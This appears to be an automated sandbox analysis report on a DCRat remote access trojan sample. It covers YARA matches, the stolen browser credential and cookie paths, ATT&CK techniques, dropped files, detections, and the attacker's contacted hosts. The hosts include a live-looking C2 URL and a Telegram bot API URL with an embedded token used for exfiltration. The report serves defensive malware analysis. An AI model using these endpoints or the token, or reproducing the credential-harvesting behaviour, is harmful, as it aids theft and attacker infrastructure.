                                    Source: Yara matchFile source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 5012, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6324, type: MEMORYSTR
                                    Source: Yara matchFile source: YGk3y6Tdix.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED
                                    Source: Yara matchFile source: YGk3y6Tdix.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History-journal
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                                    Source: C:\Drivers\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                    Remote Access Functionality

                                    barindex
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 5012, type: MEMORYSTR
                                    Source: Yara matchFile source: Process Memory Space: fontdrvhost.exe PID: 6324, type: MEMORYSTR
                                    Source: Yara matchFile source: YGk3y6Tdix.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED
                                    Source: Yara matchFile source: YGk3y6Tdix.exe, type: SAMPLE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.68606f6.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.YGk3y6Tdix.exe.52076f6.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 4.0.fontdrvhost.exe.b80000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Drivers\fontdrvhost.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Internet Explorer\SIGNUP\services.exe, type: DROPPED
                                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts11
                                    Windows Management Instrumentation
                                    11
                                    Scripting
                                    1
                                    DLL Side-Loading
                                    1
                                    Disable or Modify Tools
                                    1
                                    OS Credential Dumping
                                    1
                                    System Time Discovery
                                    Remote Services1
                                    Archive Collected Data
                                    1
                                    Web Service
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    1
                                    DLL Side-Loading
                                    12
                                    Process Injection
                                    1
                                    Deobfuscate/Decode Files or Information
                                    LSASS Memory2
                                    File and Directory Discovery
                                    Remote Desktop Protocol1
                                    Data from Local System
                                    1
                                    Ingress Tool Transfer
                                    Exfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    1
                                    Scheduled Task/Job
                                    3
                                    Obfuscated Files or Information
                                    Security Account Manager37
                                    System Information Discovery
                                    SMB/Windows Admin Shares1
                                    Clipboard Data
                                    11
                                    Encrypted Channel
                                    Automated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
                                    Software Packing
                                    NTDS1
                                    Query Registry
                                    Distributed Component Object ModelInput Capture3
                                    Non-Application Layer Protocol
                                    Traffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    DLL Side-Loading
                                    LSA Secrets121
                                    Security Software Discovery
                                    SSHKeylogging14
                                    Application Layer Protocol
                                    Scheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts333
                                    Masquerading
                                    Cached Domain Credentials2
                                    Process Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items31
                                    Virtualization/Sandbox Evasion
                                    DCSync31
                                    Virtualization/Sandbox Evasion
                                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                                    Process Injection
                                    Proc Filesystem1
                                    Application Window Discovery
                                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                                    Remote System Discovery
                                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing11
                                    System Network Configuration Discovery
                                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                    Hide Legend

                                    Legend:

                                    • Process
                                    • Signature
                                    • Created File
                                    • DNS/IP Info
                                    • Is Dropped
                                    • Is Windows Process
                                    • Number of created Registry Values
                                    • Number of created Files
                                    • Visual Basic
                                    • Delphi
                                    • Java
                                    • .Net C# or VB.NET
                                    • C, C++ or other language
                                    • Is malicious
                                    • Internet
                                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583014 Sample: YGk3y6Tdix.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 71 api.telegram.org 2->71 73 250345cm.renyash.ru 2->73 75 ipinfo.io 2->75 89 Suricata IDS alerts for network traffic 2->89 91 Antivirus detection for URL or domain 2->91 93 Antivirus detection for dropped file 2->93 97 11 other signatures 2->97 11 YGk3y6Tdix.exe 3 7 2->11         started        14 fontdrvhost.exe 2->14         started        18 FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe 3 2->18         started        20 2 other processes 2->20 signatures3 95 Uses the Telegram API (likely for C&C communication) 71->95 process4 dnsIp5 51 C:\Drivers\fontdrvhost.exe, PE32 11->51 dropped 53 6RHoR6LVzzezwu6iEj...HRXCcmMIlUFOAkT.vbe, data 11->53 dropped 22 wscript.exe 1 11->22         started        81 250345cm.renyash.ru 104.21.38.84, 49733, 49734, 49737 CLOUDFLARENETUS United States 14->81 55 C:\Users\user\Desktop\szTqaJAi.log, PE32 14->55 dropped 57 C:\Users\user\Desktop\jWKBqQkB.log, PE32 14->57 dropped 59 C:\Users\user\Desktop\iIcaGucE.log, PE32 14->59 dropped 61 4 other malicious files 14->61 dropped 109 Tries to harvest and steal browser information (history, passwords, etc) 14->109 111 Multi AV Scanner detection for dropped file 18->111 file6 signatures7 process8 signatures9 99 Windows Scripting host queries suspicious COM object (likely to drop second stage) 22->99 25 cmd.exe 1 22->25         started        process10 process11 27 fontdrvhost.exe 17 24 25->27         started        32 conhost.exe 25->32         started        dnsIp12 77 api.telegram.org 149.154.167.220, 443, 49732, 49753 TELEGRAMRU United Kingdom 27->77 79 ipinfo.io 34.117.59.81, 443, 49730, 49731 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 27->79 63 C:\...\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe, PE32 27->63 dropped 65 C:\Users\user\Desktop\tWFZTedC.log, PE32 27->65 dropped 67 C:\Users\user\Desktop\sRuyTvnC.log, PE32 27->67 dropped 69 10 other malicious files 27->69 dropped 101 Antivirus detection for dropped file 27->101 103 Multi AV Scanner detection for dropped file 27->103 105 Machine Learning detection for dropped file 27->105 107 4 other signatures 27->107 34 cmd.exe 27->34         started        37 schtasks.exe 27->37         started        39 schtasks.exe 27->39         started        41 16 other processes 27->41 file13 signatures14 process15 signatures16 83 Uses ping.exe to sleep 34->83 85 Drops executables to the windows directory (C:\Windows) and starts them 34->85 87 Uses ping.exe to check the status of other devices and networks 34->87 43 conhost.exe 34->43         started        45 chcp.com 34->45         started        47 PING.EXE 34->47         started        49 FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe 34->49         started        process17

                                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                    windows-stand
                                    SourceDetectionScannerLabelLink
                                    YGk3y6Tdix.exe60%VirustotalBrowse
                                    YGk3y6Tdix.exe63%ReversingLabsWin32.Trojan.DCRat
                                    YGk3y6Tdix.exe100%AviraVBS/Runner.VPG
                                    YGk3y6Tdix.exe100%Joe Sandbox ML
                                    SourceDetectionScannerLabelLink
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe100%AviraVBS/Runner.VPG
                                    C:\Users\user\Desktop\CANODYsk.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\MihenAyR.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Drivers\fontdrvhost.exe100%AviraHEUR/AGEN.1323342
                                    C:\Program Files\Internet Explorer\SIGNUP\services.exe100%AviraHEUR/AGEN.1323342
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat100%AviraBAT/Delbat.C
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%AviraHEUR/AGEN.1323342
                                    C:\Users\user\Desktop\BimGJlFQ.log100%AviraTR/AVI.Agent.updqb
                                    C:\Users\user\Desktop\LRGWtOLy.log100%AviraTR/PSW.Agent.qngqt
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\aFStzZSn.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\MihenAyR.log100%Joe Sandbox ML
                                    C:\Users\user\Desktop\RKjvWuQm.log100%Joe Sandbox ML
                                    C:\Drivers\fontdrvhost.exe100%Joe Sandbox ML
                                    C:\Program Files\Internet Explorer\SIGNUP\services.exe100%Joe Sandbox ML
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\jWKBqQkB.log100%Joe Sandbox ML
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\sRuyTvnC.log100%Joe Sandbox ML
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe100%Joe Sandbox ML
                                    C:\Users\user\Desktop\LRGWtOLy.log100%Joe Sandbox ML
                                    C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Drivers\fontdrvhost.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Program Files\Internet Explorer\SIGNUP\services.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\BimGJlFQ.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\CANODYsk.log50%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\LRGWtOLy.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\MihenAyR.log71%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    C:\Users\user\Desktop\RKjvWuQm.log8%ReversingLabs
                                    C:\Users\user\Desktop\aFStzZSn.log8%ReversingLabs
                                    C:\Users\user\Desktop\bsCLGWVU.log4%ReversingLabs
                                    C:\Users\user\Desktop\iIcaGucE.log25%ReversingLabs
                                    C:\Users\user\Desktop\jWKBqQkB.log9%ReversingLabs
                                    C:\Users\user\Desktop\jqKBOCJa.log25%ReversingLabs
                                    C:\Users\user\Desktop\knlJjCXV.log4%ReversingLabs
                                    C:\Users\user\Desktop\sRuyTvnC.log9%ReversingLabs
                                    C:\Users\user\Desktop\szTqaJAi.log3%ReversingLabs
                                    C:\Users\user\Desktop\tWFZTedC.log3%ReversingLabs
                                    C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe73%ReversingLabsByteCode-MSIL.Trojan.DCRat
                                    No Antivirus matches
                                    No Antivirus matches
                                    SourceDetectionScannerLabelLink
                                    http://250345cm.reP0%Avira URL Cloudsafe
                                    http://250345cm.renyash.ru/100%Avira URL Cloudmalware
                                    http://250345cm.renyash.ru/sqltemp.php100%Avira URL Cloudmalware
                                    http://250345cm.renyash.ru100%Avira URL Cloudmalware
                                    NameIPActiveMaliciousAntivirus DetectionReputation
                                    ipinfo.io
                                    34.117.59.81
                                    truefalse
                                      high
                                      api.telegram.org
                                      149.154.167.220
                                      truefalse
                                        high
                                        250345cm.renyash.ru
                                        104.21.38.84
                                        truetrue
                                          unknown
                                          NameMaliciousAntivirus DetectionReputation
                                          https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotofalse
                                            high
                                            http://250345cm.renyash.ru/sqltemp.phptrue
                                            • Avira URL Cloud: malware
                                            unknown
                                            https://ipinfo.io/countryfalse
                                              high
                                              https://ipinfo.io/ipfalse
                                                high
                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtab3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                  high
                                                  https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFdhpSrMBRff.26.drfalse
                                                    high
                                                    http://www.fontbureau.com/designersGfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://duckduckgo.com/ac/?q=3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                        high
                                                        http://www.fontbureau.com/designers/?fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cn/bThefontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://api.telegram.orgfontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://api.telegram.org/botfontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.drfalse
                                                                high
                                                                http://www.fontbureau.com/designers?fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.tiro.comfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                      high
                                                                      http://www.fontbureau.com/designersfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.drfalse
                                                                          high
                                                                          http://www.goodfont.co.krfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoXfontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.sajatypeworks.comfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.typography.netDfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.founder.com.cn/cn/cThefontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.galapagosdesign.com/staff/dennis.htmfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://250345cm.rePfontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstalldoH1J2y0cr.26.drfalse
                                                                                        high
                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                          high
                                                                                          http://www.galapagosdesign.com/DPleasefontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://www.fonts.comfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.sandoll.co.krfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://www.urwpp.deDPleasefontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://www.zhongyicts.com.cnfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namefontdrvhost.exe, 00000004.00000002.1755507962.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://www.sakkal.comfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://250345cm.renyash.rufontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        • Avira URL Cloud: malware
                                                                                                        unknown
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://www.fontbureau.comfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                                              high
                                                                                                              http://ipinfo.iofontdrvhost.exe, 00000004.00000002.1755507962.0000000003825000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                http://250345cm.renyash.ru/fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: malware
                                                                                                                unknown
                                                                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                                                  high
                                                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.drfalse
                                                                                                                    high
                                                                                                                    https://www.ecosia.org/newtab/fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drfalse
                                                                                                                      high
                                                                                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdhpSrMBRff.26.drfalse
                                                                                                                        high
                                                                                                                        https://support.mozilla.org/products/firefoxfontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://go.micfontdrvhost.exe, 0000001A.00000002.2897795682.000000000084A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://ipinfo.iofontdrvhost.exe, 00000004.00000002.1755507962.000000000380B000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755507962.0000000003849000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://www.carterandcone.comlfontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpfalse
